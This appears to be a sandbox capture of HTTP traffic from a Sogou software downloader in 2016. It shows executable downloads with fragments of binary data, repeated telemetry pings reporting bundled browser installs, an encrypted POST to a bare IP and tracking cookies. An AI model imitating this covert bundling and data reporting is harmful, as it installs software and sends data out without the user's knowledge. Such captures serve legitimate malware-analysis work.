ft_id><logo_url><![CDATA[hXXp://dl.app.sogou.com/pc_logo/7
638937123950702413.png]]></logo_url></Item><Item>
<soft_id><![CDATA[-4581287645299687438]]></soft_id>&
lt;logo_url><![CDATA[hXXp://dl.app.sogou.com/128128.png]]><
;/logo_url></Item></SoftInfoResponse>.HTTP/1.1 200 OK..
Server: nginx..Date: Thu, 19 May 2016 07:13:05 GMT..Content-Type: text
/html; charset=gb2312..Content-Length: 359..Connection: keep-alive..X-
Powered-By: PHP/5.3.3..<?xml version="1.0" encoding="utf-8"?>.&l
t;SoftInfoResponse><Item><soft_id><![CDATA[763893712
3950702413]]></soft_id><logo_url><![CDATA[hXXp://dl.
app.sogou.com/pc_logo/7638937123950702413.png]]></logo_url>&l
t;/Item><Item><soft_id><![CDATA[-4581287645299687438
]]></soft_id><logo_url><![CDATA[hXXp://dl.app.sogou.
com/128128.png]]></logo_url></Item></SoftInfoRespons
e>...



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5852718-5912222
Referer: hXXp://112.5.251.215/pub/download/201010
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:42 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /externalapp/SogouSoftwareExternalApp.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: yze.t.sogou.com
Connection: Keep-Alive
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.0 200 OK
Date: Wed, 18 May 2016 11:51:24 GMT
Content-Type: application/octet-stream
ETag: "-394504404"
Accept-Ranges: bytes
Last-Modified: Wed, 18 May 2016 11:42:04 GMT
Content-Length: 5844568
Server: WS CDN Server
Age: 69684
Via: 1.0 db80:8032 (Cdn Cache Server V2.0)
Connection: close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................Z...........0.......p....@.........
.................P......|.Y......................................s....
[email protected].................................................
.............p...............................text....X.......Z........
.......... ..`.rdata.......p.......^..............@[email protected].......
[email protected][email protected].
...n.......p...t..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
..>[email protected].>[email protected]
...Pr@..}[email protected]... M.......M....3.....FQ.....NU..
M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...
[email protected]}[email protected].}.j.W.E......E.......Pp@.
[email protected]@.W...E..E.h [email protected]...\r
@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.
......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[...U.
<<< skipped >>>


GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=7220069-7373409
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:39 GMT
Content-Type: text/html
Content-Length: 162
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>....



GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=3120567-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:48 GMT
Content-Type: application/octet-stream
Content-Length: 8588961
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 3120567-11709527/11709528
f..Q....0.P\q....=6...?Y[J..if.@w%....z.*..iH~d>.........QY%..~....
m:.........2.`-.F..W.....'...p.G..L....G.Y....!;...b.V...*.j.*v.t/z%Y.
a.2O......V....LSJ}...9........x.SK*.......J.:.#...-...*.q#....l14.|.C
.7..e....xW.h.Nd_..4I..7.p.G.a3j6.`...:4.O...!....Z.z...<<..6.J;
 2a....%...?r...'EF...;.i} .:^~...........(W..~Y.fd .Y.....H.....\[.Qx
)..!.J@#R?...iC)h.uJ...T...4-2.5..)\.....!'.k1@#....H.7../"R.......'..
....`S.......E..5.l.......cJPs.&$...>.^:..ie.....(.$h......}I.p...{
..%..................xm#[email protected]..@D.`}%...fXr....o.0|.e.
..O.....&.n.....*..y.V.....`.....\8 ...[..O...0....U......bjt.8B..|.4.
-z_...._...O.D<...oCA.}.......;pf.]......h.0H....3.....w"...D1R...J
i....q.A.....%......Ce..0....wxF.$y.......|V...:.N.q..Po....(...^.X.6?
..{./*.......\.Up....j.Xo.&<.xJKK.v...M.w..n.....`....eK.3 Tw~Q.=#v
\x....BI.o.....9:...m..&.........%~.h.`.}.a....j.4.l...sJ...\.".......
x6..^.Z...H...bL...3'.s..I..C..5.I..Z.2...@.../U,.. 7u..E.6).b....pb..
[email protected]..=. 8.K\.k:.m.)_..;.O.....it.d..=.&z..3....o.t.BAK.g...bJ..s9
V{z.^....DOB.g..5.....Nc1..2.oVMXm.......n............ ..c..Kq.../....
^.yW.#>}.;9.K...Y.S5. P8F../..y~......./)[email protected]#..........Z.....W
r....u....aZ.. Eu1.`o.UO.Tz.......X..c.. ..>.<*.#..2a7h..t.N....
u..}<..7....V..w......aXE. {. ......W.33}o..! 6S../....\..4...S.\..
.&R.KU..B.'.Z..K........RQ?..[..1.....5br.`XF. @..0da;..5......Q....o}
W.....V2m......p.......{..'.m:Na.t..!....2...k5..]?I...e.P.......lpV..
.8...W......;>]o......
<<< skipped >>>


GET /app/a/10190001/CC1430117533187 HTTP/1.1
Accept: */*
Referer: hXXp://xz.sogou.com/softRecommend
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: img03.sogoucdn.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: NWS_VCLOUD_ACCESS
Connection: keep-alive
Date: Thu, 19 May 2016 07:13:33 GMT
Cache-Control: max-age=86400
Expires: Fri, 20 May 2016 07:13:33 GMT
Last-Modified: Thu, 19 May 2016 00:14:23 GMT
Content-Type: image/png
Content-Length: 104812
X-Cache-Lookup: Hit From MemCache
ETag: 14bc09e4cd90b4aa7520414ded59b107
X-Daa-Tunnel: hop_count=1
X-Cache-Lookup: Hit From Inner Cluster 
.PNG........IHDR.............2.m&....pHYs................MiCCPPhotosho
p ICC profile..x..SwX...>..e.VB....l.."#[email protected]..
..H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.
. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....
ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v
.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."
...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[
..V.h..][email protected].<......%b..0..>[email protected].@...
...qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N.
...l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A......
........a.D@.$.<.B........A.T.:.............18....\..p..`........A.
..a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u
@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v..
..a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._
.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R..
.J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.
......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.
y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.
rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...
b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6.
.l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......
)..k.f....t...,.......9..k.a........E..J.6.....|...M....V>VyV.V
<<< skipped >>>


GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=11452511-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:41 GMT
Content-Type: application/octet-stream
Content-Length: 257017
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 11452511-11709527/11709528
@E.4....2i...Q...O...{.. ...h.g..-.'._..G. ..eR..m.P..L.R..X....w..L..
..u_.<q..D.F9.S.(.l.2Y1k...T.w..O Q..:vHJ(....k.Yw..%[email protected],.."
 .....x&g.N.'...R....Y.{..i..'. ...'H...s4..............>...w6.M.W.
.....i..'gG.~....)w.....K......e..~..k}...u.{/9r......h;......f.e.Z..i
Q?....G9.A.... m....._c......".. ^xO"Q.X.{...S.z1..O.0....l...j.......
....Py....8i..C..c....!p~K........b)...w..^..k.`..%)r..PG.K..^...?.bl.
4o..].h8........kw1..T....6{.v1.k...X.i.....UP(.B.....8l........e.8e.O
.T.3..{..`.!...|5....4.#_p..Y]D..5..\.(4O!oO.,.....Zj.....u.l..=.&..aC
.e.%..<...U..`!..(.r)......j...|...........4S..x....6.cY....F?....T
.P..*m.?.....P....9..i.t..M.d...v.......Q.T..V..e................0...F
5.,-.......8d.e..~N}......D..\....h. ...M. u...@@3..f{Q.....!....'eI[H
f..=..?}.H. .|.=..........~&.s..%.z..Sx......?.M..kA...}[email protected].....
u.CF]...........\.s)...d..../.r.5O.I.5...Z...$g.u.[....j0.]>.m9<
..-)2.P...jT.:}...X..-Y7a~..s..{.2!......m...............}@L./U.,8r.F.
.R.`....i...k.`@..).2^..8D_.s.J......K...d*.8..K.~L.w..O0[e.W...0.....
.).X_...h.b.VQ...jN..8".A..r=F...s~._........&3...rNL.........M.o"...A
.8.q.....Ha.I.Tp,..._#Eh%2..(.\rM2fG#..J.Z.^.:!..h....N(.7W.M..8...^\.
@.H...%/.m.I....z/.W..>.lMd....d..(.)0`.P.>..*.....j...b...i.f.H
-.-8.=iLI5....0...S%Xf.rd....... .0...C.Z.a....\.{ .b'w.i'.zI%p.......
vFT.$...p.G[@W.9.ZL8r.".8..zbd`.k.......j........M.i.'...aQ.`.GP`fzdW.
..(.)..2.y.K3...*.<iX0...n. ..d.f...s..@.(LR. I0....{0ES!G.M....0Y.
....KRxNO......Kp..h.Ko.u..p.Fr..w.Y...........,j.....y....\..3m..
<<< skipped >>>


GET /softdl.360tpcdn.com/wifiGX/wifiGX_2.1.7.5.exe HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: close
Host: 119.84.12.22
Pragma: no-cache
Range: bytes=4260115-
Referer: hXXp://119.84.12.22/softdl.360tpcdn.com/wifiGX
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 206 Partial Content
Server: nginx
Date: Thu, 19 May 2016 07:13:37 GMT
Content-Type: application/octet-stream
Content-Length: 7449413
Last-Modified: Wed, 08 Apr 2015 05:54:22 GMT
Connection: close
Content-Range: bytes 4260115-11709527/11709528
.a.....N......~]}.b.0 ...%~...fKd..@....]F...U.~V.........."|...]W6"..
.T`\...-.p.. ....f....^......[.K.m&._:D....p*2G..i...i....L1..;....):{
.1*.../.. .....$q..d.R<d..9...k&*.......ON.....\,K..i# ...?5..E.1$.
..i...B.>..Hv........t.~Z...<&e.\IB.. ..!.K.....\..AD..l.t..yPv.
.F.%...D....m..7....C$...J..y....4....4..zq..UT..d......O..O..%..N.'.;
.....etyv...D..1~:..3j.....9..i.IuQ.<... .(...%x.6...j..S...(.....@
.w_.|P.A....F.nh.\w....2.U.[i.o-tu.Sz.E...|..w..6..K!........o.....s..
.f..s.a.]....4......|.......]..yPP9j.|..}..}N.2..l.\V.......#.......m.
.(.z.....T.....-.J.....&...)~.......z.xc.[.rf.e.M.7..\gyF.\.../...!b..
....s..._<.0..{;.\...n.....y..j...;.<.HM.(G.W...?.........#..mE{
.....&~G....zZ#$..*.....ZZ8.V5.qb.,b............ D.D!%h45.'...z.7..B..
.m.Q..(.&N...1.Q^Lg_x.BlG..kN..5..\}.u;Tdr..=...R.W..{xi.9?.....a.6.._
@.Vp.J...C.K.."..>.w....B.....8. ...x..&:3....4.J...apB..a[A..j....
.i.3s...7......*......-........_..>...vb.0.....4.6.*k.Iy...yu.."...
.pE...e...........[..st...r ..hLcIr.....0.....yO....1.`f1..J..v....YT.
.........`.NK"'?.h ..e..rb%....t..M{.yR.*Y.*.ms....p$.P.....z)..u.-...
8..Z..W0..L...Q.Kj......."(..iW....f.vC.......kg.P.......g....e.K..:}.
.Y.K.....R=U.u.Y...6.....dh...G....o.:....e...HI..p...#..Y.}.h.d#..,..
.R......v..c\..>K........k.}......n.O.x.l-..}AM8...S8eW....H.:.m..@
......S...x..........$..J...b.c..k...$....}M/<r!.,.U.oJ*{..G....kIJ
.!Q....00..0.6..........f./../..Ev..Mx..H.........)........~ .825..;..
5.M:m......pWdI.g.k0.;.A....U......K.....J..O.B....`....c..fK2. ..
<<< skipped >>>


HEAD /128128.png HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml xml, image/pjpeg, application/x-ms-xbap, application/msword, application/vnd.ms-excel, application/vnd.ms-powerpoint, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; {D9D54F49-E51C-445e-92F2-1EE3C2313240})
Host: dl.app.sogou.com
Content-Length: 0
Cache-Control: no-cache
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.0 503 Service Unavailable
Server: Cdn Cache Server V2.0
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: text/html
Content-Length: 1564
Expires: Thu, 19 May 2016 07:13:09 GMT
X-Cache-Error: ERR_CANNOT_FORWARD 11
Via: 1.0 db80:7002 (Cdn Cache Server V2.0)
Connection: close



GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=801&rand=1463641986 HTTP/1.1
User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:01 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx..Date: Thu, 19 May 2016 07:13:01 GMT..C
ontent-Type: application/octet-stream..Content-Length: 0..Connection: 
keep-alive......


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=thirdparty_pcmgr_qb&bindname=pcmgr&weight=0&scheme=&rand=1463641988 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:02 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx..Date: Thu, 19 May 2016 07:13:02 GMT..C
ontent-Type: application/octet-stream..Content-Length: 0..Connection: 
keep-alive......


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463641991 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:06 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=232&bindtype=thirdparty_pcmgr_qb&bindname=pcmgr&weight=0&scheme=&errortype=4&rand=1463641991 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:06 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463641992 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:06 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx..Date: Thu, 19 May 2016 07:13:06 GMT..C
ontent-Type: application/octet-stream..Content-Length: 0..Connection: 
keep-alive......


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=231&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463641992 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:07 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=4&activatetype=download&rand=1463641993 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=DA60F2C22E71980A00000000573D676F


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=5&servicestate=4&rand=1463641994 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463641995 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:09 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=100&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463641995 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=installfinishbind&bindname=QQBrowser&weight=0&scheme=a&rand=1463641995 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=232&bindtype=installfinishbind&bindname=QQBrowser&weight=0&scheme=a&errortype=1&rand=1463641995 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=installfinishbind&bindname=SogouExplorer&weight=1&scheme=e&rand=1463641996 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:10 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=800&sogousoftware=1&updateservice=1&rand=1463641996 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:11 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
....


GET /pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=11&sogousoftware=1&updateservice=1&rand=1463641997 HTTP/1.1


User-Agent: HttpRequest
Host: ping.t.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C; usid=1IstgWf2O_cQ41s1; SUV=004D48F6C2F260DA573D67833DE92580; wuid=AAG4Snp EQAAAAqSCSejiAEAyQQ=


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:13:11 GMT
Content-Type: application/octet-stream
Content-Length: 0
Connection: keep-alive
HTTP/1.1 200 OK..Server: nginx..Date: Thu, 19 May 2016 07:13:11 GMT..C
ontent-Type: application/octet-stream..Content-Length: 0..Connection: 
keep-alive..



POST / HTTP/1.1
Host: 58.254.134.138:80
Content-type: application/octet-stream
Content-Length: 140
Connection: Keep-Alive

A...........m..N.Jg.H)........K.J..s.=......E!&...f...a4z..>..u....A.....Lhs...C.z.H.(.W..$*.\d.._..y.......@? .h.......j..G.D.Q..B......X
HTTP/1.1 200 OK
Content-Length: 268
Content-Type: application/octet-stream
Connection: Close
HTTP/1.1 200 OK..Content-Length: 268..Content-Type: application/octet-
stream..Connection: Close..A..............C....A.;."..k.1.Z...........
K.@.. .l.W...'k...R.ja....e.hdD...cq.C|.4P.....l....o..V...\".O;.INr..
..5...........E~:[email protected][email protected]...:...o Y..<..k.Y
[D.-/..gr...q..J .~..C.oe.\]......9,..F..b......)...k.9(.@|.(....J....
...b?....p..'Hb.H*..



GET /pub/download/201010/WiFi-2175.exe?filename=WiFi-2175.exe&src=sougou HTTP/1.1
Accept: */*
Accept-Language: en-us
Cache-Control: no-cache
Connection: Keep-Alive
Host: ftp-fj-p2sp.pconline.com.cn
Pragma: no-cache
Range: bytes=5733707-5971727
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)


HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 19 May 2016 07:13:39 GMT
Content-Type: text/html
Content-Length: 522
Connection: keep-alive
<html>..<head><title>404 Not Found</title><
/head>..<body bgcolor="white">..<center><h1>404 N
ot Found</h1></center>..<hr><center>nginx</
center>..</body>..</html>..<!-- The padding to disab
le MSIE's friendly error page -->..<!-- The padding to disable M
SIE's friendly error page -->..<!-- The padding to disable MSIE'
s friendly error page -->..<!-- The padding to disable MSIE's fr
iendly error page -->..<!-- The padding to disable MSIE's friend
ly error page -->..<!-- The padding to disable MSIE's friendly e
rror page -->....



GET /handleUserIdDb256?userid=182290f2326cb222d4f13e5ed25565ed&downloadtype=bpackage&unc=sogousoftware_normal&pcid=0&mode=recommend HTTP/1.1
User-Agent: HttpRequest
Host: xz.sogou.com
Cookie: IPLOC=UA; SUID=DA60F2C28460900A00000000573D676C


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 19 May 2016 07:12:47 GMT
Content-Type: text/plain; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: usid=DA60F2C22E71980A00000000573D676F; expires=Fri, 19-May-17 07:12:47 GMT; domain=.sogou.com; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
70e..<?xml version="1.0" encoding="utf-8"?>..<DOCUMENT>...
<bindtype><![CDATA[downloadbpackage]]></bindtype>...
.<item>..        <weight><![CDATA[0]]></weight>
;..        <name><![CDATA[SogouSoftware]]></name>...
.<description><![CDATA[..................B...]]></descr
iption>....<installedfeature>.....<type><![CDATA[key
andpath]]></type>.....<key><![CDATA[HKEY_LOCAL_MACHI
NE\SOFTWARE\Wow6432Node\SogouSoftware]]></key>.....<valuen
ame><![CDATA[LaunchAppPath]]></valuename>.....<file&
gt;<![CDATA[]]></file>..        </installedfeature>.
...<installedfeature>.....<type><![CDATA[keyandpath]]&g
t;</type>.....<key><![CDATA[HKEY_LOCAL_MACHINE\SOFTWARE
\SogouSoftware]]></key>.....<valuename><![CDATA[Laun
chAppPath]]></valuename>.....<file><![CDATA[]]>&l
t;/file>..        </installedfeature>....<appcheckurl>&
lt;![CDATA[hXXp://t.sogou.com/update_platform/update.php?appname=sogou
download_bindsecontrol&v=1.0.0.0]]></appcheckurl>....<appc
heckreporturl><![CDATA[hXXp://t.sogou.com/update_platform/done.p
